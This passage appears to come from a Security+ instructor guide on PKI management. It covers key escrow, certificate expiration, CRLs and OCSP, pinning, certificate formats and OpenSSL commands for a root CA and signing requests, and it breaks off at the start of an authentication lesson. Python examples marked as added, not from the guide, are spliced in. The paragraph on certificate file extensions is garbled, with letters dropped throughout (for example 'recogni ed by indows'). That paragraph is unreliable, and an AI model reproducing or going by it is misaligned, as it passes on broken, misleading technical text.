A code signing certificate. Certificates are issued for specific purposes. A certificate
issued for one purpose should not be reused for other functions.

6. What extension field is used with a web server certificate to support the
identification of the server by multiple specific subdomain labels?

The subject alternative name (SAN) field. A wildcard certificate will match any
subdomain label.


Topic 6B
Implement PKI Management

EXAM OBJECTIVES COVERED
3.9 Given a scenario, implement public key infrastructure
4.1 Given a scenario, use the appropriate tool to assess organizational security
(OpenSSL only)

As a security professional, you are very likely to have to install and maintain public
key infrastructure (PKI) certificate services for private networks. You may also need to
obtain and manage certificates from public PKI providers. This topic will help you to
install and configure PKI and to troubleshoot and revoke certificates.

Teaching Tip: Again, you may prefer to focus more on labs for this topic. Most of the
content examples are straightforward, though students can find certificate formats
difficult.

Show Slide(s): Certificate and Key Management

Certificate and Key Management
Key management refers to operational considerations for the various stages in a key's
life cycle. A key's life cycle may involve the following stages:
• Key generation: creating a secure key pair of the required strength, using the
chosen cipher.
• Certificate generation: to identify the public part of a key pair as belonging to a
subject (user or computer), the subject submits it for signing by the CA as a digital
certificate with the appropriate key usage. At this point, it is critical to verify the
identity of the subject requesting the certificate and only issue it if the subject
passes identity checks.
• Storage: the user must take steps to store the private key securely, ensuring that
unauthorized access and use is prevented. It is also important to ensure that the
private key is not lost or damaged.
• Revocation: if a private key is compromised, the key pair can be revoked to prevent
users from trusting the public key.
• Expiration and renewal: a key pair that has not been revoked expires after a certain
period. Giving the key or certificate a "shelf-life" increases security. Certificates can
be renewed with new key material.

Teaching Tip: We're focusing on public key cryptography here, but do note that
symmetric keys and SSH keys have management requirements too. We'll be covering
SSH later in the course.

Key management can be centralized, meaning that one administrator or authority
controls the process, or decentralized, in which each user is responsible for his or
her keys.
Certificate and key management can represent a critical vulnerability if not managed
properly. If an attacker can obtain a private key, it puts both data confidentiality and
identification/authentication systems at risk. If an attacker gains the ability to create
signed certificates that appear to be valid, it will be easy to harvest huge amounts of
information from the network, as the user and computer accounts he or she sets up will
be automatically trusted. Finally, if a key used for encryption is accidentally destroyed,
the data encrypted using that key will be inaccessible, unless there is a backup or key
recovery mechanism.


Show Slide(s): Key Recovery and Escrow

Key Recovery and Escrow
Keys such as the private key of a root CA must be subject to the highest possible
technical and procedural access controls. If such a key were compromised, it would
put the confidentiality and integrity of data processed by hundreds or thousands of
systems at risk. Access to such critical encryption keys must be logged and audited
and is typically subject to M-of-N control, meaning that of N number of administrators
permitted to access the system, M must be present for access to be granted. M must
be greater than 1, and N must be greater than M. For example, when M=2 and
N=4, any two of four administrators must be present. Staff authorized to perform
key management must be carefully vetted, and due care should be taken if these
employees leave the business.

Another way to use M-of-N control is to split a key between several storage devices (such as
three USB sticks, any two of which could be used to recreate the full key).

If the key used to decrypt data is lost or damaged, the encrypted data cannot be
recovered unless a backup of the key has been made. A significant problem with key
storage is that if you make multiple backups of a key, it is exponentially more difficult
to ensure that the key is not compromised. However, if the key is not backed up, the
storage system represents a single point of failure. Key recovery defines a secure
process for backing up keys and/or recovering data encrypted with a lost key. This
process might use M-of-N control to prevent unauthorized access to and use of
the archived keys. Escrow means that something is held independently. In terms of
key management, this refers to archiving a key (or keys) with a third party. This is a
useful solution for organizations that don't have the capability to store keys securely
themselves, but it invests a great deal of trust in the third party.
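The M-of-N split described above (any M of N shares recreating the full key, as in the three-USB-sticks note, and the same control applied to an archived recovery key), as an added example that is not from the guide, implemented with Shamir's secret sharing over a prime field. The choice of prime and the function names are this example's own assumptions.

```python
"""M-of-N control over a key with Shamir's secret sharing.

Added example, not from the CompTIA guide. A 256-bit key is split into N
shares (one per USB stick or per administrator); any M of the shares
rebuild it exactly, while M-1 shares reveal nothing about the key.
Arithmetic is over GF(p) with p = 2**521 - 1 (a Mersenne prime, chosen
here only because it exceeds any 256-bit secret; the guide does not
prescribe a field).
"""
import secrets
from typing import List, Tuple

P = 2 ** 521 - 1  # field modulus; every 256-bit secret is < P

Share = Tuple[int, int]  # (x, f(x)) with x in 1..N


def _eval_poly(coeffs: List[int], x: int) -> int:
    """Horner evaluation of the polynomial with coefficients c0..c(m-1) at x."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc


def split_secret(secret: int, m: int, n: int) -> List[Share]:
    """Split secret into n shares of which any m recover it.

    Enforces the guide's M-of-N rule: M > 1 (no single holder can act
    alone) and N > M (one absent holder cannot block access).
    """
    if not (1 < m < n):
        raise ValueError("require 1 < M < N")
    if not (0 <= secret < P):
        raise ValueError("secret out of range for the field")
    # Random polynomial of degree m-1 whose constant term is the secret.
    coeffs = [secret] + [secrets.randbelow(P) for _ in range(m - 1)]
    return [(x, _eval_poly(coeffs, x)) for x in range(1, n + 1)]


def recover_secret(shares: List[Share]) -> int:
    """Lagrange interpolation at x=0 from the supplied shares.

    With fewer than M shares this returns a random-looking value rather
    than an error: Shamir sharing cannot detect an insufficient quorum,
    so the quorum size has to be enforced procedurally.
    """
    xs = [x for x, _ in shares]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate share")
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % P
                den = den * (xi - xj) % P
        total = (total + yi * num * pow(den, -1, P)) % P
    return total


def split_key(key: bytes, m: int, n: int) -> List[Share]:
    """Convenience wrapper: split a raw key (e.g. a 32-byte AES key)."""
    return split_secret(int.from_bytes(key, "big"), m, n)


def recover_key(shares: List[Share], key_len: int) -> bytes:
    """Reassemble a raw key of key_len bytes from a quorum of shares."""
    return recover_secret(shares).to_bytes(key_len, "big")


if __name__ == "__main__":
    key = secrets.token_bytes(32)   # constructed sample key
    shares = split_key(key, 2, 4)   # M=2, N=4, as in the guide's example
    print("any two of four recover it:", recover_key(shares[1:3], 32) == key)
```

Each share is an (x, y) pair that can be written to its own device; the shares themselves should never be stored together, and a quorum check (count the shares before calling recover_key) belongs in the procedure around this code, since the arithmetic alone will happily return garbage for too few shares.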

Show Slide(s): Certificate Expiration

Certificate Expiration
Certificates are issued with a limited duration, as set by the CA policy for the certificate
type. Root certificates might have long expiration dates (10+ years), whereas web
server and user certificates might be issued for 1 year only. Typically, a certificate is
renewed before it expires. Where a user is in possession of a valid certificate, less
administration is required (in terms of checking identity) than with a request for a new
certificate. When you are renewing a certificate, it is possible to use the existing key
(referred to specifically as key renewal) or generate a new key (the certificate is "rekeyed").
A new key might be generated if the old one was no longer considered long enough or
if any compromise of the key was feared.
When a certificate expires, there is the question of what to do with the key pair that
it represents. A key can either be archived or destroyed. Destroying the key offers
more security, but has the drawback that any data encrypted using the key will be
unreadable. Whether a key is archived or destroyed will largely depend on how the key
was used. In software terms, a key can be destroyed by overwriting the data (merely
deleting the data is not secure). A key stored on hardware can be destroyed by a
specified erase procedure or by destroying the device.

Show Slide(s): Certificate Revocation Lists

Certificate Revocation Lists
A certificate may be revoked or suspended:
• A revoked certificate is no longer valid and cannot be "un-revoked" or reinstated.
• A suspended certificate can be re-enabled.


A certificate may be revoked or suspended by the owner or by the CA for many
reasons. For example, the certificate or its private key may have been compromised,
the business could have closed, a user could have left the company, a domain name
could have been changed, the certificate could have been misused in some way, and
so on. These reasons are codified under choices such as Unspecified, Key Compromise,
CA Compromise, Superseded, or Cessation of Operation. A suspended key is given the
code Certificate Hold.
It follows that there must be some mechanism for informing users whether a certificate
is valid, revoked, or suspended. CAs must maintain a certificate revocation list
(CRL) of all revoked and suspended certificates, which can be distributed throughout
the hierarchy.

CRLs published by Windows Certificate Services. The current CRL contains one revoked certificate.
(Screenshot used with permission from Microsoft.)

With the CRL system, there is a risk that the certificate might be revoked but still
accepted by clients because an up-to-date CRL has not been published. A further
problem is that the browser or other application may not be configured to
perform CRL checking, although this now tends to be the case only with legacy
browser software.

Show Slide(s): Online Certificate Status Protocol Responders

Online Certificate Status Protocol Responders
Another means of providing up-to-date information is to check the certificate's status
on an Online Certificate Status Protocol (OCSP) server, referred to as an OCSP
responder. Rather than return a whole CRL, this just communicates the status of the
requested certificate. Details of the OCSP responder service should be published in
the certificate.

Most OCSP servers can query the certificate database directly and obtain the real-time
status of a certificate. Other OCSP servers actually depend on the CRLs and are limited by
the CRL publishing interval.


One of the problems with OCSP is that the job of responding to requests is resource
intensive and can place high demands on the issuing CA running the OCSP responder.
There is also a privacy issue, as the OCSP responder could be used to monitor and
record client browser requests. OCSP stapling resolves these issues by having the SSL/
TLS web server periodically obtain a time-stamped OCSP response from the CA. When
a client submits an OCSP request, the web server returns the time-stamped response,
rather than making the client contact the OCSP responder itself.
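A status check that combines a CRL with a stapled OCSP response, as an added example that is not from the guide. The CRL and OCSP records are constructed sample data held in plain dicts whose keys mirror the X.509 field names (thisUpdate, nextUpdate, a CRLReason per revoked serial, the OCSP certStatus); the decision policy (prefer the staple, fall back to the CRL, otherwise report unknown rather than good) is this example's own and is stricter than the soft-fail behaviour many clients use.

```python
"""Revocation checking with a CRL and a stapled OCSP response.

Added example, not from the CompTIA guide. Sample CRL and OCSP records
are constructed; field names mirror X.509 but the dict layout is this
example's own. The logic fails closed: without fresh evidence that a
certificate is good, the answer is "unknown", never "good".
"""
from datetime import datetime, timedelta, timezone
from typing import Optional

# CRLReason codes (RFC 5280). certificateHold (6) is a suspension the CA
# may later lift; the other reasons are permanent.
CERTIFICATE_HOLD = 6
REASONS = {0: "unspecified", 1: "keyCompromise", 2: "cACompromise",
           4: "superseded", 5: "cessationOfOperation", 6: "certificateHold"}


def crl_status(crl: dict, serial: int, now: datetime) -> str:
    """good / revoked / suspended / stale according to a CRL."""
    if now > crl["nextUpdate"]:
        return "stale"       # the CA missed its publishing interval
    entry = crl["revoked"].get(serial)
    if entry is None:
        return "good"        # absent from the list as of thisUpdate
    return "suspended" if entry["reason"] == CERTIFICATE_HOLD else "revoked"


def ocsp_status(resp: dict, serial: int, now: datetime,
                max_age: timedelta) -> str:
    """Status from a stapled OCSP single response, after freshness checks."""
    if resp["serial"] != serial:
        return "unknown"     # the staple is for a different certificate
    if not (resp["thisUpdate"] <= now <= resp["nextUpdate"]):
        return "stale"       # outside the responder's validity window
    if now - resp["thisUpdate"] > max_age:
        return "stale"       # the server stapled an old response
    if resp["certStatus"] == "good":
        return "good"
    if resp["certStatus"] == "revoked":
        return "suspended" if resp.get("reason") == CERTIFICATE_HOLD else "revoked"
    return "unknown"


def revocation_status(serial: int, now: datetime,
                      stapled: Optional[dict] = None,
                      crl: Optional[dict] = None,
                      max_age: timedelta = timedelta(days=1)) -> str:
    """Prefer the stapled OCSP response; fall back to the CRL; fail closed."""
    if stapled is not None:
        status = ocsp_status(stapled, serial, now, max_age)
        if status not in ("stale", "unknown"):
            return status
    if crl is not None:
        status = crl_status(crl, serial, now)
        if status != "stale":
            return status
    return "unknown"


# Constructed sample data.
T0 = datetime(2021, 8, 1, tzinfo=timezone.utc)        # CRL publication time
SAMPLE_CRL = {
    "thisUpdate": T0, "nextUpdate": T0 + timedelta(days=7),
    "revoked": {0x1001: {"date": T0, "reason": 1},   # keyCompromise
                0x1002: {"date": T0, "reason": 6}},  # certificateHold
}
# Certificate 0x2002 is compromised one day after the CRL was published;
# the CRL will not say so until the next publishing interval, but the
# responder (and therefore a fresh staple) does.
SAMPLE_STAPLE_2002 = {"serial": 0x2002, "certStatus": "revoked", "reason": 1,
                      "thisUpdate": T0 + timedelta(days=1),
                      "nextUpdate": T0 + timedelta(days=2)}

if __name__ == "__main__":
    later = T0 + timedelta(hours=36)
    print("CRL only:   ", revocation_status(0x2002, later, crl=SAMPLE_CRL))
    print("with staple:", revocation_status(0x2002, later, SAMPLE_STAPLE_2002, SAMPLE_CRL))
```

The 0x2002 case is the CRL-lag problem from the text: the list published at T0 still reports the certificate as good 36 hours later, while the staple obtained after the compromise reports it revoked, and the check trusts the staple. Once the staple is past its nextUpdate and the CRL is past its own, the function reports unknown instead of falling back to good.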

Show Slide(s): Certificate Pinning

Certificate Pinning
When certificates are used by a transport protocol, such as SSL/TLS, there is
a possibility that the chain of trust among the client, the server, and whatever
intermediate and root CAs have provided certificates can be compromised. If an
adversary can substitute a malicious but trusted certificate into the chain (using
some sort of proxy or man-in-the-middle attack), they could be able to snoop on the
supposedly secure connection.
Pinning refers to several techniques to ensure that when a client inspects the
certificate presented by a server or a code-signed application, it is inspecting the
proper certificate. This might be achieved by embedding the certificate data in the
application code, or by submitting one or more public keys to an HTTP browser via an
HTTP header, which is referred to as HTTP Public Key Pinning (HPKP).

HPKP has serious vulnerabilities and has been deprecated (developer.mozilla.org/en-
US/docs/Web/HTTP/Public_Key_Pinning). The replacement mechanism is the Certificate
Transparency Framework.

Show Slide(s): Certificate Formats

Certificate Formats
There are various formats for encoding a certificate as a digital file for exchange
between different systems.

Teaching Tip: Differences between Windows and Linux make certificate formats a far
more complex issue than it really should be. Explain that there are binary and text
formats, and then go through the extensions.

Encoding
Cryptographic data (both certificates and keys) are processed as binary using
Distinguished Encoding Rules (DER). Binary format files are not commonly used,
however.
More typically, the binary data is represented as ASCII text characters using Base64
Privacy-enhanced Electronic Mail (PEM) encoding. ASCII format data has descriptive
headers, such as the "BEGIN CERTIFICATE" string.

Base64-encoded .CER file opened in Notepad. (Screenshot used with permission from Microsoft.)


ile tensions
A three character file e tension is a convention, not a standard, and unfortunately file
e tensions do not always map cleanly to the type of encoding used within a certificate
file, or even to the contents of a certificate file. The only certain way to check is to open
it in a te t editor.
• oth .D and . M can be used as file e tensions, although the latter is not
recogni ed by indows. . M is the the most widely used e tension for A CII
format files in Linu .

• The .C T and .C e tensions can also be used, but they they are not well
standardi ed. Most of the confusion arises from the way indows handles
certificates. In Linu , .C T is most likely to represent an A CII certificate. In indows,
the most common e tension is .C , but this does not tell you whether the file
format is binary or A CII.

Contents
A certificate file can also contain more than just a single certificate:
• The PKCS #12 format allows the export of the private key with the certificate. This
would be used either to transfer a private key to a host that could not generate
its own keys, or to back up/archive a private key. This type of file format is usually
password protected and always binary. On Windows, these usually have a .PFX
extension, while macOS and iOS use .P12. In Linux, the certificate and key are
usually stored in separate files.

• The P7B format implements PKCS #7, which is a means of bundling multiple
certificates in the same file. It is typically in ASCII format. This is most often used
to deliver a chain of certificates that must be trusted by the processing host. It
is associated with the use of S/MIME to encrypt email messages. P7B files do
not contain the private key. In Linux, the .PEM extension is very widely used for
certificate chains.
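Because the extension says nothing reliable about the encoding, the check has to be done on the file's bytes. The following Python is an added example, not code from the CompTIA guide: it classifies a file as PEM (ASCII armor around Base64) or DER (binary, starting with the ASN.1 SEQUENCE tag 0x30), decodes every PEM block in a chain file, and walks the outer DER elements. The DER structure it builds is constructed for the demonstration and is not a real certificate.

```python
"""Classify a certificate file as PEM or DER from its bytes, not its extension.

Added example, not from the CompTIA guide: .cer/.crt/.pem tell you nothing
reliable, so this looks at content. PEM is ASCII with "-----BEGIN ...-----"
armor around Base64; DER is binary and every X.509 certificate begins with
the ASN.1 SEQUENCE tag 0x30. The DER structure built below is constructed
for the demonstration and is not a real certificate.
"""
import base64
import re

PEM_BLOCK = re.compile(
    rb"-----BEGIN ([A-Z0-9 ]+)-----\s*(.*?)\s*-----END \1-----", re.DOTALL)

def der_tlv(tag: int, content: bytes) -> bytes:
    """Encode one ASN.1 element as tag, definite length, value."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])                      # short form
    else:
        size = (n.bit_length() + 7) // 8         # long form: 0x80|N, then N bytes
        length = bytes([0x80 | size]) + n.to_bytes(size, "big")
    return bytes([tag]) + length + content

def der_elements(data: bytes):
    """Yield (tag, value) for each top-level TLV element in a DER blob."""
    i = 0
    while i < len(data):
        tag, first = data[i], data[i + 1]
        if first < 0x80:
            n, i = first, i + 2
        else:
            size = first & 0x7F
            n = int.from_bytes(data[i + 2:i + 2 + size], "big")
            i += 2 + size
        yield tag, data[i:i + n]
        i += n

def to_pem(label: str, der: bytes) -> bytes:
    """Wrap DER bytes in PEM armor using 64-character Base64 lines."""
    b64 = base64.b64encode(der)
    body = b"\n".join(b64[j:j + 64] for j in range(0, len(b64), 64))
    return (f"-----BEGIN {label}-----\n".encode() + body
            + f"\n-----END {label}-----\n".encode())

def classify(data: bytes) -> str:
    """'PEM', 'DER' or 'unknown', decided by content alone."""
    if data.lstrip().startswith(b"-----BEGIN "):
        return "PEM"
    if data[:1] == b"\x30":      # SEQUENCE: outer element of an X.509 Certificate
        return "DER"
    return "unknown"

def pem_blocks(data: bytes):
    """Decode every PEM block (a chain file holds several) to (label, DER)."""
    return [(m.group(1).decode(), base64.b64decode(m.group(2)))
            for m in PEM_BLOCK.finditer(data)]

def inspect_file(data: bytes) -> dict:
    """Summarize a file: its format, how many DER objects it carries, their tags."""
    fmt = classify(data)
    if fmt == "PEM":
        objects = [der for _, der in pem_blocks(data)]
    elif fmt == "DER":
        objects = [data]
    else:
        objects = []
    return {"format": fmt, "count": len(objects),
            "outer_tags": [next(der_elements(obj), (None,))[0] for obj in objects]}

# Constructed stand-in for a certificate: SEQUENCE { INTEGER 2, UTF8String ... }.
# The string is padded past 127 bytes so the long-form length encoding is used.
FAKE_CERT = der_tlv(0x30, der_tlv(0x02, b"\x02")
                    + der_tlv(0x0C, b"constructed placeholder, not a certificate " * 4))

if __name__ == "__main__":
    print(inspect_file(FAKE_CERT))                        # DER, one object
    chain = to_pem("CERTIFICATE", FAKE_CERT) * 2          # a two-certificate chain
    print(inspect_file(chain))                            # PEM, two objects
    print(inspect_file(b"not a certificate at all"))      # unknown
```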

OpenSSL

Show Slide(s): OpenSSL

Teaching Tip: This section is illustrative of some OpenSSL commands. Note again that
in Linux the file extension is conventional only. Certificates are used in ASCII format. A
private key might be encrypted to apply password protection.

In a Windows environment, certificate infrastructure is installed and managed as Active
Directory Certificate Services. There is a certutil tool for command line management, or
you can use PowerShell.
For Linux, CA services are typically implemented using the OpenSSL suite (openssl.org).
The following represent a few of the many operations that can be accomplished using
openssl commands.

Root CA
To configure a root CA in OpenSSL, set up a directory structure and adapt an OpenSSL
configuration file (openssl.cnf) for any site-local settings. You then need to create an
RSA key pair:

openssl genrsa -aes256 -out cakey.pem 4096

The -aes256 argument encrypts the key and requires a password to make use of it.
The 4096 argument sets the key length. The output file data is in PEM ASCII format by
default. Some sites prefer a naming convention, such as ca.key.
The next step is to use this RSA key pair to generate a self-signed root X.509 digital
certificate:


openssl req -config openssl.cnf -key cakey.pem -new -x509 -days 7300 -sha256 -out cacert.pem

This example is simplified. Using a root CA to issue leaf certificates directly is not robust. It is
better to create one or more intermediate CAs.

Certificate Signing Requests

To configure a certificate on a host, create a certificate signing request (CSR) with a new
key pair. This command is run on the web server:

openssl req -nodes -new -newkey rsa:2048 -out www.csr -keyout www.key

Having run the command, you then complete the prompts to enter the subject
information for the certificate, taking care to match the common name (CN) to the
FQDN by which clients access the server. This key is created without a password, which
would have to be input at any restart of the web server application. We can rely on
general access control security measures to protect the key.
This CSR file must then be transmitted to the CA server. On the CA, run the following
command to sign the CSR and output the X.509 certificate (-infiles must be the last
option, because every argument after it is read as a request file name):

openssl ca -config openssl.cnf -extensions webserver -out www.pem -infiles www.csr

The passphrase must be entered to confirm use of the cakey.pem private key. The
-extensions argument selects an area of the configuration file for a particular
certificate type. This sets the key usage attribute, plus any other extended attributes
that are needed.
You can view the new certificate to check the details using the following two
commands:

openssl x509 -noout -text -in www.pem
openssl verify -verbose -CAfile cacert.pem www.pem

Transmit the www.pem file to the web server and update the server configuration to
use it and the www.key private key.

Key and Certificate Management

You might export a copy of the private key from this server to be held in escrow as a
backup. For this usage, you must password protect the key:

openssl rsa -aes256 -in www.key -out www.key.bak

You might need to convert the certificate format to make it compatible with an
application server, such as Java. The following command takes a PEM-encoded
certificate and outputs a DER binary-encoded certificate:

openssl x509 -outform der -in www.pem -out www.der

Another use case is to export a key and certificate for use in Windows:

openssl pkcs12 -export -inkey www.key -in www.pem -out www.pfx
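The root CA, CSR and signing steps above depend on a site-local openssl.cnf that the text only alludes to. The following Python script is an added example, not code from the CompTIA guide: it drives the same openssl commands through subprocess and supplies the minimal configuration that openssl ca and -extensions webserver assume. It requires the openssl binary on PATH; the CA name, host name, passphrase and directory layout are constructed for the example.

```python
"""Run the root CA -> CSR -> signing -> verification workflow with OpenSSL.

Added example, not from the CompTIA guide: it chains the openssl commands the
text shows and supplies the minimal openssl.cnf that `openssl ca` and the
`-extensions webserver` argument assume. Requires the openssl binary on PATH;
the CA name, host name, passphrase and file names are constructed.
"""
import shutil
import subprocess
import tempfile
from pathlib import Path

# Site-local configuration (constructed). [ CA_default ] tells `openssl ca`
# where its database, serial file and key live; [ webserver ] is the section
# selected by `-extensions webserver` and fixes the key usage attributes.
OPENSSL_CNF = """\
[ ca ]
default_ca = CA_default

[ CA_default ]
dir           = {dir}
database      = $dir/index.txt
new_certs_dir = $dir/newcerts
serial        = $dir/serial
certificate   = $dir/cacert.pem
private_key   = $dir/cakey.pem
default_md    = sha256
default_days  = 365
policy        = policy_any

[ policy_any ]
commonName = supplied

[ req ]
prompt             = no
distinguished_name = req_dn
x509_extensions    = v3_ca

[ req_dn ]
CN = placeholder overridden by -subj

[ v3_ca ]
basicConstraints     = critical, CA:TRUE
keyUsage             = critical, keyCertSign, cRLSign
subjectKeyIdentifier = hash

[ webserver ]
basicConstraints = CA:FALSE
keyUsage         = critical, digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName   = DNS:www.example.com
"""

def openssl(*args, cwd: Path) -> str:
    """Run one openssl command in cwd; raise CalledProcessError on failure."""
    done = subprocess.run(["openssl", *args], cwd=cwd, check=True,
                          capture_output=True, text=True)
    return done.stdout

def build_ca_and_issue_cert(workdir=None, ca_pass="example-passphrase"):
    """Return {'text': ..., 'verify': ..., 'dir': ...}, or None without openssl."""
    if shutil.which("openssl") is None:
        return None
    work = Path(workdir or tempfile.mkdtemp(prefix="pki-"))
    (work / "newcerts").mkdir(exist_ok=True)
    (work / "index.txt").touch()             # empty certificate database
    (work / "serial").write_text("01\n")     # next serial number, in hex
    (work / "openssl.cnf").write_text(OPENSSL_CNF.format(dir=work))
    passin = f"pass:{ca_pass}"

    # Root CA: AES-256 encrypted RSA key, then a self-signed X.509 certificate.
    openssl("genrsa", "-aes256", "-passout", passin, "-out", "cakey.pem", "4096", cwd=work)
    openssl("req", "-config", "openssl.cnf", "-key", "cakey.pem", "-passin", passin,
            "-new", "-x509", "-days", "7300", "-sha256",
            "-subj", "/CN=Example Root CA", "-out", "cacert.pem", cwd=work)

    # Web server: unencrypted key plus a CSR whose CN matches the FQDN.
    openssl("req", "-config", "openssl.cnf", "-nodes", "-new", "-newkey", "rsa:2048",
            "-subj", "/CN=www.example.com", "-out", "www.csr", "-keyout", "www.key", cwd=work)

    # The CA signs the CSR; -batch skips the interactive confirmation prompts.
    openssl("ca", "-batch", "-config", "openssl.cnf", "-passin", passin,
            "-extensions", "webserver", "-out", "www.pem", "-infiles", "www.csr", cwd=work)

    text = openssl("x509", "-noout", "-text", "-in", "www.pem", cwd=work)
    verify = openssl("verify", "-verbose", "-CAfile", "cacert.pem", "www.pem", cwd=work)
    return {"text": text, "verify": verify.strip(), "dir": str(work)}

if __name__ == "__main__":
    result = build_ca_and_issue_cert()
    print(result["verify"] if result else "openssl not found on PATH")
```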


Certificate Issues

Show Slide(s): Certificate Issues

Teaching Tip: Troubleshooting is no longer called out on the syllabus, so you may
prefer to skip this section. It has been retained as general implementation detail. Point
out that browsers often use a different set of root trusts than Windows itself does.

The most common problem when dealing with certificate issues is that of a client
rejecting a server certificate (or slightly less commonly, an authentication server
rejecting a client's certificate).
• If the problem is with an existing certificate that has been working previously, check
that the certificate has not expired or been revoked or suspended.

• If the problem is with a new certificate, check that the key usage settings are
appropriate for the application. Some clients, such as VPN and email clients, have
very specific requirements for key usage configuration. Also, check that the subject
name is correctly configured and that the client is using the correct address. For
example, if a client tries to connect to a server by IP address instead of FQDN, a
certificate configured with an FQDN will be rejected.

• If troubleshooting a new certificate that is correctly configured, check that clients
have been configured with the appropriate chain of trust. You need to install root
and intermediate CA certificates on the client before a leaf certificate can be trusted.
Be aware that some client applications might maintain a different certificate store to
that of the OS.

• In either case, verify that the time and date settings on the server and client
are synchronized. Incorrect date/time settings are a common cause of
certificate problems.

From a security point of view, you must also audit certificate infrastructure to
ensure that only valid certificates are being issued and trusted. Review logs of issued
certificates periodically. Validate the permissions of users assigned to manage
certificate services. Check clients to ensure that only valid root CA certificates are
trusted. Make sure clients are checking for revoked or suspended certificates.


Review Activity:
PKI Management
Answer the following questions:

1. What are the potential consequences if a company loses control of a
private key?

It puts both data confidentiality and identification and authentication systems at risk.
Depending on the key usage, the key may be used to decrypt data with authorization.
The key could also be used to impersonate a user or computer account.

2. You are advising a customer about encryption for data backup security and
the key escrow services that you offer. How should you explain the risks of
key escrow and potential mitigations?

Escrow refers to archiving the key used to encrypt the customer's backups with your
company as a third party. The risk is that an insider attack from your company may be
able to decrypt the data backups. This risk can be mitigated by requiring M of N access
to the escrow keys, reducing the risk of a rogue administrator.

3. What mechanism informs clients about suspended or revoked keys?

Either a published Certificate Revocation List (CRL) or an Online Certificate Status
Protocol (OCSP) responder.

4. What mechanism does HPKP implement?

HTTP Public Key Pinning ensures that when a client inspects the certificate
presented by a server or a code-signed application, it is inspecting the proper
certificate by submitting one or more public keys to an HTTP browser via an HTTP
header.

5. What type of certificate format can be used if you want to transfer your
private key and certificate from one Windows host computer to another?

PKCS #12 / .PFX / .P12

6. What type of operation is being performed by the following command?

openssl req -nodes -new -newkey rsa:2048 -out my.csr -keyout mykey.pem

This generates a new RSA key pair plus a certificate signing request.


Lesson 6
Summary

Teaching Tip: Check that students are confident about the content that has been
covered. If there is time, revisit any content examples that they have questions about. If
you have used all the available time for this lesson block, note the issues and schedule
time for a review later in the course.

You should be familiar with the tools and procedures used to issue different types of
certificate and manage PKI operations.

Guidelines for Implementing Public Key Infrastructure

Follow these guidelines when you implement public key infrastructure (PKI) on a
private network:

• Determine whether to use a single CA or intermediate structure and take steps to
ensure the security of the root, keeping it offline if that is operationally possible.

• Determine certificate policies and templates that meet the needs of users and
business workflows, such as machine, email user, and code signing certificate
types. Ensure that the common name attribute is correctly configured when
issuing certificates.

• Create policies and procedures for users and servers to request certificates, plus the
identification, authentication, and authorization processes to ensure certificates are
only issued to valid subjects.

• Support users with options for converting certificates to different formats.

• Set up procedures for managing keys and certificates, including revocation and
backup/escrow of keys.

• Be prepared to assist users with certificate troubleshooting issues.

Lesson 7
Implementing Authentication Controls

LESSON INTRODUCTION

Teaching Tip: Continuing the protect function theme, this lesson and the following one
cover identity and access management (IAM). This lesson focuses on authentication
mechanisms, whereas Lesson 8 covers identity management, account management,
and authorization management.

Each network user and host device must be identified with an account so that you
can control their access to your organization's applications, data, and services.
The processes that support this requirement are referred to as identity and access
management (IAM). Within IAM, authentication technologies ensure that only valid
subjects (users or devices) can operate an account. Authentication requires the account
holder to submit credentials that should only be known or held by them in order to
access the account. There are many authentication technologies and it is imperative
that you be able to compare and contrast and to implement these security controls.

Lesson Objectives

In this lesson, you will:
• Summarize authentication design concepts.

• Implement knowledge-based authentication.

• Implement authentication technologies.

• Summarize biometrics authentication concepts.

Topic 7A
Summarize Authentication
Design Concepts

EXAM OBJECTIVES COVERED

2.4 Summarize authentication and authorization design concepts

Teaching Tip: This topic introduces IAM as a domain of security activity and discusses
basic concepts, following the relevant content examples from the design objective
2.4. The remainder of the 2.4 objectives are covered throughout Lessons 7 and 8.

Strong authentication is the first line of defense in the battle to secure network
resources. But authentication is not a single process; there are many different methods
and mechanisms, some of which can be combined to form more effective products.
As a network security professional, familiarizing yourself with identification and
authentication technologies can help you select, implement, and support the ones that
are appropriate for your environment.

Identity and Access Management

Show Slide(s): Identity and Access Management

Teaching Tip: Stress the distinction between identification (basically, performing
identity proofing and creating a user account) and authentication (the process that
proves that a user account is being accessed by the user for whom it was created).
The term IAM reflects the importance of the identification component, which is
omitted in the earlier AAA framework. Students can think of IAAAM, perhaps.

An access control system is the set of technical controls that govern how subjects may
interact with objects. Subjects in this sense are users, devices, or software processes,
or anything else that can request and be granted access to a resource. Objects are the
resources; these could be networks, servers, databases, files, and so on. An identity
and access management (IAM) system is usually described in terms of four main
processes:
• Identification: creating an account or ID that uniquely represents the user, device,
or process on the network.

• Authentication: proving that a subject is who or what it claims to be when it
attempts to access the resource.

• Authorization: determining what rights subjects should have on each resource,
and enforcing those rights.

• Accounting: tracking authorized usage of a resource or use of rights by a subject
and alerting when unauthorized use is detected or attempted.


Differences among identification, authentication, authorization, and accounting. (Images © 123RF.com.)

IAM enables you to define the attributes that make up an entity's identity, such as its
purpose, function, security clearance, and more. These attributes subsequently enable
access management systems to make informed decisions about whether to grant
or deny an entity access, and if granted, decide what the entity has authorization to
do. For example, an individual employee may have his or her own identity in the IAM
system. The employee's role in the company factors into his or her identity, such as
what department the employee is in and whether the employee is a manager. For
example, if you are setting up an e-commerce site and want to enroll users, you need
to select the appropriate controls to perform each function:
• Identification: ensure that customers are legitimate. For example, you might need
to ensure that billing and delivery addresses match and that they are not trying to
use fraudulent payment methods.

• Authentication: ensure that customers have unique accounts and that only they
can manage their orders and billing information.

• Authorization: rules to ensure customers can place orders only when they
have valid payment mechanisms in place. You might operate loyalty schemes or
promotions that authorize certain customers to view unique offers or content.

• Accounting: the system must record the actions a customer takes (to ensure that
they cannot deny placing an order, for instance).

The servers and protocols that implement these functions are referred to as
authentication, authorization, and accounting (AAA). The use of IAM to describe
enterprise processes and workflows is becoming more prevalent as the importance of
the identification phase is better acknowledged.


Authentication Factors

Show Slide(s): Authentication Factors

Teaching Tip: Multifactor authentication as a principle should be familiar to the
students from A+ and Network+, but there are some additional attributes concepts
that require attention. We present the detail on the ownership and biometric factors in
separate topics later in the lesson. You might want to note the use of CAPTCHA here
too. This isn't a content example, but it is in the acronyms list and included as a
